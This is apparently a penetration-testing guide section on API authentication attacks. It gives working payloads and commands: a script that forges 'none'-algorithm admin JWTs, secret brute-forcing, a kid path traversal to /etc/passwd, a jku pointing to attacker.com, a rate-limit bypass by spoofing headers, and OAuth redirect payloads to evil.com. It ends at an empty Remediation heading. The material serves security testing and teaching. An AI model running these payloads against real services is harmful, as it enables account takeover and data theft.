Authentication Testing

Authentication mechanisms are the gatekeepers of the API. Weaknesses here can lead to full account takeover. Common targets include JWT implementation flaws, leaked API keys, and OAuth misconfigurations.

JWT (JSON Web Token) Attacks

JWTs are composed of three parts: header, payload, and signature. They are Base64 encoded.

Decode JWT (base64):

echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9" | base64 -d
# Output: {"alg":"HS256","typ":"JWT"}

Attack 1: None Algorithm

Some libraries allow the "none" algorithm, which means no signature is required. Change the algorithm in the header to "none" and remove the signature part.

import base64
import json

header = {"alg": "none", "typ": "JWT"}
payload = {"user": "admin", "role": "admin"}

h = base64.urlsafe_b64encode(json.dumps(header).encode()).rstrip(b'=')
p = base64.urlsafe_b64encode(json.dumps(payload).encode()).rstrip(b'=')
token = h.decode() + '.' + p.decode() + '.'
print(token)

Attack 2: Weak Secret Brute Force

If the signing secret is weak, it can be brute-forced offline.

Use jwt_tool:

python3 jwt_tool.py <JWT> -C -d /usr/share/wordlists/rockyou.txt

Use hashcat (mode 16500):

hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt

Attack 3: Algorithm Confusion

If the server expects RS256 (asymmetric) but allows HS256 (symmetric), you can sign a token using the public key as the secret.

Get public key and use it as HMAC secret:

python3 jwt_tool.py <JWT> -X k -pk public_key.pem

Attack 4: Key ID (kid) Injection

The kid header parameter might be vulnerable to path traversal or command injection if used to retrieve the key from the filesystem.

{"alg":"HS256","typ":"JWT","kid":"../../etc/passwd"}

Attack 5: JKU/X5U Header Injection

Inject a URL pointing to an attacker-controlled JWKS file.

{"alg":"RS256","jku":"https://attacker.com/.well-known/jwks.json"}

API Key Testing

API keys should be treated as secrets. Check how they are transmitted and if they are leaked.

Check if API key is in URL (bad practice):

GET /api/data?api_key=abc123

API key in header (better):

curl -H "X-API-Key: abc123" https://api.target.com/data
curl -H "Authorization: Api-Key abc123" https://api.target.com/data

Key Leakage

Search for leaked keys in source code, mobile apps, or browser storage.

Check JavaScript source files:

grep -r "api_key|apikey|api-key|apiKey" *.js

Permission Testing

Check if the key has excessive permissions.

curl -H "X-API-Key: $KEY" https://api.target.com/admin/users
curl -H "X-API-Key: $KEY" https://api.target.com/internal/config

Rate Limiting Bypass

Try to bypass rate limits by rotating keys or IP addresses.

for i in {1..100}; do
  curl -H "X-API-Key: $KEY" -H "X-Forwarded-For: 192.168.1.$i" https://api.target.com/data
done

OAuth 2.0 / OIDC Testing

Authorization Code Flow Attacks

Check for CSRF (missing state parameter) and Open Redirects.

Check for state parameter - if missing, vulnerable to CSRF:

GET /oauth/authorize?client_id=app&redirect_uri=https://app.com/callback&response_type=code

Open Redirect via redirect_uri manipulation:

• /oauth/authorize?client_id=app&redirect_uri=https://evil.com/steal
• /oauth/authorize?client_id=app&redirect_uri=https://app.com.evil.com/callback
• /oauth/authorize?client_id=app&redirect_uri=https://app.com/callback/../../../evil
• /oauth/authorize?client_id=app&redirect_uri=https://app.com/callback%00.evil.com

Authorization Code Injection

If an attacker can inject their own authorization code into a victim's session, they can link the victim's account to the attacker's.

https://app.com/callback?code=ATTACKER_CODE

Scope Manipulation

Try to request elevated scopes that were not originally granted.

/oauth/authorize?...&scope=read write admin delete

Token Endpoints

Test the token endpoint for weak client secrets or improper grant handling.

Token endpoint password grant:

curl -X POST https://auth.target.com/oauth/token \
  -d "grant_type=password&username=user&password=pass&client_id=app"

Refresh token grant:

curl -X POST https://auth.target.com/oauth/token \
  -d "grant_type=refresh_token&refresh_token=xxx&client_id=app"

Remediation